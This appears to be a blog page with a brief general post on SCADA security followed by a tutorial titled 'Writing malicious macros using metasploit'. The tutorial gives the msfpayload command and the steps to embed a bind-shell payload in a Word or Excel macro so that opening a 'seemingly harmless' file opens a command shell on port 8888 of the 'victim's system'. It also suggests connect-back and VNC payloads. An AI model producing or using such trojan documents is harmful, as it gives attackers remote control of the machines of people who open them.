SCADA Security

SCADA Operator

I’ve been registered with the SCADA Security Mailing List for a while now, and I must say it is very informative and has some solid discussion about SCADA systems and security. If you are not familiar with what SCADA is, it stands for Supervisory Control And Data Acquisition. SCADA systems are generally used for controlling and maintaining public services and private sector systems such as but not limited to nuclear plants, environmental systems, industrial stations, etc. You can google for more information or check our SCADA’s Wikipedia Page.

Security has and also been a big issue with running SCADA systems, especially those connected and maintained over the internet, or really any kind of network. Firewalls and IDS’s can only do so much; the integrity of the applications must be a part of the solution, AND NOT COLLAPSE! There are also many books at amazon that deal with SCADA systems. Could the internal workings of outdated coding practices and weak security in the systems, that control our precious resources and way of life, prove to be insecure? You better believe it.

Writing malicious macros using metasploit

This is actually a nice little feature of Metasploit which many of us are not aware. Here I will guide you through this.

Metasploit is nice tool written in ruby and very useful to penetration testers (and script kiddies) It provides good information on exploit techniques and is also a useful resource for exploit developers and security professionals. Latest release is 3.1 version as of now and its upcoming version 3.2 will be more hack-pack.

Enough of insight into metasploit, now back to action. We will create a malicious .doc file which will spawn a tcp shell on port 8888 on simply opening the file. However remember that MACROs must be enabled on victim’s system.
1. Go to Start–>All Programs–>Metasploit–>CMD SHELL.

2. type cd %APPDATA%
3. Next type in: ruby msf3/msfpayload windows/shell_bind_tcp LPORT=8888 V > macro.vba
4. Now to use this malicious vba file, open Microsoft Word/Excel.

5. Go to tools–>Macros–>Visual Basic Editor. Copy the contents of vba file and paste in the VB editor.

6. To enable macro tools–>Macros–>Security. Select the security level as low.

You get this alert window up when macro is disabled.

7. Now save the doc file.

8. On opening the seemingly harmless file, it will automatically spawn a cmd shell on port 8888.

Telnet on that port to spawn a command shell.

So now we have a malicious doc ready for action. We can use any available payload like connect back to attacker or even vnc inject payload. Hope this is helpful.